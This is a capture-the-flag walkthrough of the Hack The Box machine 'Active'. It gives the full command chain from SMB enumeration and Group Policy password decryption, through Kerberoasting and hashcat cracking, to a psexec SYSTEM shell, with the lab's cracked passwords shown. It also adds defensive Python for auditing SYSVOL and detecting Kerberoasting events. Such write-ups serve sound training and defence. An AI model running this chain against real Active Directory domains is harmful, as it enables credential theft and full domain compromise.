HTB - Active
Last updated
Used smbmap to enumerate SMB and found a Group Policy Preferences config file (Groups.xml) with an encrypted password.
Decrypted the password using gpp-decrypt.
Used BloodHound to enumerate the DC.
Found that the Administrator user was Kerberoastable.
# Nmap 7.80 scan initiated Sat Mar 7 16:31:24 2020 as:
nmap -Pn -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49169,49171,49182 -oN nmap/Active_nmap.txt 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.085s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-07 21:33:51Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
49182/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 2m18s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-03-07T21:34:47
|_ start_date: 2020-03-07T21:19:38
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 7 16:34:35 2020 -- 1 IP address (1 host up) scanned in 190.90 seconds
# Nmap 7.80 scan initiated Sat Mar 7 16:34:35 2020 as:
nmap -Pn -sU -oN nmap/Active.udp 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.038s latency).
Not shown: 971 closed ports
PORT STATE SERVICE
53/udp open domain
88/udp open|filtered kerberos-sec
123/udp open ntp
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
389/udp open|filtered ldap
464/udp open|filtered kpasswd5
500/udp open|filtered isakmp
2048/udp open|filtered dls-monitor
4500/udp open|filtered nat-t-ike
5355/udp open|filtered llmnr
17573/udp open|filtered unknown
28641/udp open|filtered unknown
48761/udp open|filtered unknown
49205/udp open|filtered unknown
51554/udp open|filtered unknown
51586/udp open unknown
51690/udp open unknown
51717/udp open unknown
51905/udp open unknown
51972/udp open|filtered unknown
52144/udp open unknown
52225/udp open|filtered unknown
52503/udp open unknown
53006/udp open|filtered unknown
53037/udp open|filtered unknown
53571/udp open unknown
53589/udp open unknown
53838/udp open unknown
It looks like we can read the Replication share.
# smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Recursively listing all files using smbmap
smbmap -H 10.10.10.100 -R Replication --depth 10
# The following file is interesting, since it usually contains Group Policy Preferences creds
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 533 Sat Jul 21 06:38:11 2018 Groups.xml
Downloading the file using smbmap
smbmap -H 10.10.10.100 -R Replication --depth 10 -A Groups.xml
[+] IP: 10.10.10.100:445 Name: active.htb
[+] Starting search for files matching 'Groups.xml' on share Replication.
[+] Match found! Downloading: Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
Contents of the Groups.xml file
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Decrypting the Group Policy Password using gpp-decrypt
gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18
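The weakness here is that the AES key used for the cpassword attribute was published by Microsoft, so any cpassword left in SYSVOL is readable by every domain user who can read the share (exactly what smbmap showed above). MS14-025 removed the ability to set new ones but did not clean up existing files. The following is an added defender-side audit, not part of the original writeup: it walks a SYSVOL (or Replication) copy, opens the preference XML types that can carry credentials, and reports every item that still has a cpassword set. The embedded inputs are the page's own Groups.xml and a constructed clean counterpart with the password removed; the `scan_sysvol` helper and the `GPP_PREFERENCE_FILES` / `ACCOUNT_ATTRS` names are this example's own, and the per-type account attribute names are listed as the ones the different preference types use.

```python
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Dict, List

# Preference XML types that can carry a cpassword attribute (lower-cased for matching).
GPP_PREFERENCE_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
                        "datasources.xml", "printers.xml", "drives.xml"}

# Attribute naming the account in each preference type: Groups/Drives/Printers use
# userName, Services use accountName, ScheduledTasks use runAs, DataSources use username.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

# Sample input: the Groups.xml recovered from the Replication share above.
SAMPLE_GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>"""

# Constructed clean counterpart: the same item with the cpassword removed, which is the
# state an audit should find after the legacy entries have been cleaned up.
SAMPLE_CLEAN_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" changed="2018-07-18 20:46:06"><Properties action="U" newName="" fullName="" description="" userName="active.htb\SVC_TGS"/></User>
</Groups>"""


def find_cpasswords(xml_text: str, source: str = "<inline>") -> List[Dict[str, object]]:
    """Return one finding per element that carries a non-empty cpassword attribute."""
    root = ET.fromstring(xml_text)
    # ElementTree has no parent pointers, so build the map once per document.
    parent_of = {child: parent for parent in root.iter() for child in parent}
    findings: List[Dict[str, object]] = []
    for elem in root.iter():
        cpassword = elem.get("cpassword")
        if not cpassword:
            continue
        # The <Properties> element sits under the <User>/<Service>/... item it belongs to.
        item = parent_of.get(elem, elem)
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "")
        findings.append({
            "file": source,
            "item": item.tag,
            "name": item.get("name", ""),
            "account": account,
            "changed": item.get("changed", ""),
            "cpassword_len": len(cpassword),
        })
    return findings


def scan_sysvol(root_dir: str) -> List[Dict[str, object]]:
    """Walk a SYSVOL/Replication copy and collect cpassword findings from preference files."""
    results: List[Dict[str, object]] = []
    for path in Path(root_dir).rglob("*.xml"):
        if path.name.lower() not in GPP_PREFERENCE_FILES:
            continue
        try:
            # utf-8-sig strips the BOM that GPP files commonly start with.
            results.extend(find_cpasswords(path.read_text(encoding="utf-8-sig"), str(path)))
        except ET.ParseError:
            continue  # a malformed file is worth a manual look but should not stop the scan
    return results


if __name__ == "__main__":
    for sample in (SAMPLE_GROUPS_XML, SAMPLE_CLEAN_XML):
        for f in find_cpasswords(sample) or [{"file": "<inline>", "item": "none", "account": "-"}]:
            print(f"{f['file']}: {f['item']} account={f['account']}")
```

Running `scan_sysvol(r"\\dc\SYSVOL\active.htb\Policies")` from a domain-joined host lists every policy that still needs cleaning; each hit means the referenced account should be treated as compromised and its password rotated once the file is removed, since the decrypted value (as shown with gpp-decrypt above) has been available to every reader of the share.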
Attempting to access the box with those creds using psexec failed, because the user cannot write to any share. However, the credentials were confirmed to be valid using smbmap and crackmapexec.
./bloodhound.py -d ACTIVE.HTB -u SVC_TGS -p GPPstillStandingStrong2k18 -dc 10.10.10.100 -ns 10.10.10.100 -c All
# neo4j start
# bloodhound
Shortest Paths from Kerberoastable Users
The results of the above query show that the user Administrator is Kerberoastable.
/opt/impacket/examples/GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -request -dc-ip 10.10.10.100
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2018-07-30 13:17:40.656520
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$31fd0262c8c6885bb329b33dd932fdd9$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
I use a Windows box with nice GPUs to run hashcat... It's way faster than using the Kali VM.
# hashcat -m 13100 admin.hash rockyou.txt
Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$31fd0262c8c6885bb329b33dd932fdd9$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
#Password
Ticketmaster1968
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 TGS-REP etype 23
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4...b6783e
Time.Started.....: Sun Mar 08 01:32:02 2020 (2 secs)
Time.Estimated...: Sun Mar 08 01:32:04 2020 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 6493.5 kH/s (5.50ms) @ Accel:256 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10616832/14344385 (74.01%)
Rejected.........: 0/10616832 (0.00%)
Restore.Point....: 10223616/14344385 (71.27%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: alisonodonnell1 -> Saboka54
Hardware.Mon.#1..: Temp: 57c Util: 33% Core:1860MHz Mem:6000MHz Bus:16
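The `$krb5tgs$23$` prefix in the hash above means the service ticket was issued with etype 23 (RC4-HMAC), which is what makes it crackable offline at the speed shown. On the DC this shows up as event 4769 (a Kerberos service ticket was requested) with TicketEncryptionType 0x17 for a user account's SPN, and a tool like GetUserSPNs.py requesting tickets for every SPN produces a burst of such events from one requester. The following is an added detection example and not part of the original writeup: it parses constructed 4769 events flattened to one key=value line each (field names follow the 4769 schema; the values, the extra service accounts svc_sql and svc_backup, the source IPs and the timestamps are made up for this example, and the `load_events`, `flag_rc4_tgs` and `flag_bursts` names are this example's own) and applies two rules, one per event and one behavioural.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional

RC4_HMAC = "0x17"  # etype 23, the '$krb5tgs$23$' in the hash above
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<kv>.*)$")

# Constructed sample 4769 events. Only ACTIVE.HTB, svc_tgs and the Administrator SPN owner
# come from the page; everything else is made up for this example.
SAMPLE_EVENTS = """\
2020-03-07T21:40:01 EventID=4769 TargetUserName=DC$@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 Status=0x0 IpAddress=::1
2020-03-07T21:40:05 EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.14.20
2020-03-07T21:40:06 EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 Status=0x0 IpAddress=10.10.14.20
2020-03-07T21:40:07 EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=svc_sql TicketEncryptionType=0x17 Status=0x0 IpAddress=10.10.14.20
2020-03-07T21:40:07 EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=svc_backup TicketEncryptionType=0x17 Status=0x0 IpAddress=10.10.14.20
2020-03-07T21:40:08 EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 Status=0x1f IpAddress=10.10.14.20
2020-03-07T21:45:00 EventID=4769 TargetUserName=jdoe@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.10.50
"""


def parse_event(line: str) -> Optional[Dict[str, object]]:
    """Turn one 'timestamp key=value ...' line into a dict; None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    fields: Dict[str, object] = dict(kv.split("=", 1) for kv in m.group("kv").split())
    fields["timestamp"] = datetime.fromisoformat(m.group("ts"))
    return fields


def load_events(text: str) -> List[Dict[str, object]]:
    return [e for e in (parse_event(l) for l in text.splitlines()) if e]


def is_user_spn(service_name: str) -> bool:
    # Machine accounts end with '$' and krbtgt is the KDC itself; neither has a
    # human-chosen password, so neither is a Kerberoast target.
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def _successful_user_spn_requests(events):
    return [e for e in events
            if e.get("EventID") == "4769" and e.get("Status") == "0x0"
            and is_user_spn(str(e.get("ServiceName", "")))]


def flag_rc4_tgs(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Rule 1: a successful service ticket for a user account's SPN issued with RC4-HMAC."""
    return [e for e in _successful_user_spn_requests(events)
            if e.get("TicketEncryptionType") == RC4_HMAC]


def flag_bursts(events: List[Dict[str, object]], min_services: int = 3,
                window: timedelta = timedelta(minutes=5)) -> List[Dict[str, object]]:
    """Rule 2: one requester obtaining tickets for several distinct user SPNs in a short window."""
    by_requester = defaultdict(list)
    for e in _successful_user_spn_requests(events):
        by_requester[e["TargetUserName"]].append(e)
    alerts = []
    for requester, evs in by_requester.items():
        evs.sort(key=lambda e: e["timestamp"])
        for i, start in enumerate(evs):
            in_window = [e for e in evs[i:] if e["timestamp"] - start["timestamp"] <= window]
            services = {str(e["ServiceName"]) for e in in_window}
            if len(services) >= min_services:
                alerts.append({"requester": requester, "services": sorted(services),
                               "from": start["timestamp"], "source_ip": start.get("IpAddress")})
                break  # one alert per requester is enough
    return alerts


if __name__ == "__main__":
    evs = load_events(SAMPLE_EVENTS)
    for e in flag_rc4_tgs(evs):
        print(f"RC4 TGS: {e['TargetUserName']} -> {e['ServiceName']} from {e['IpAddress']}")
    for a in flag_bursts(evs):
        print(f"burst: {a['requester']} requested {len(a['services'])} SPNs from {a['source_ip']}")
```

Rule 1 is noisy on a domain like this one: on Windows Server 2008 R2 a user account gets RC4 service tickets by default unless AES is enabled for it, so every legitimate CIFS access to the Administrator SPN would also match. It becomes a precise signal once service accounts are switched to AES, at which point an RC4 request is itself the anomaly. Rule 2 does not depend on the encryption type and is the better first alert; the fix for the finding on this box is the usual one, a long random password on any user account that holds an SPN (or a group-managed service account), since the ticket is only crackable because the password was in rockyou.txt.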
Root Flag
psexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.21.dev1+20200225.153700.afe746d2 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file rshcyaJN.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service plcS on 10.10.10.100.....
[*] Starting service plcS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.10.100
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{B3FEC2C7-47CA-4014-A441-A3A5CDDC983C}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Windows\system32>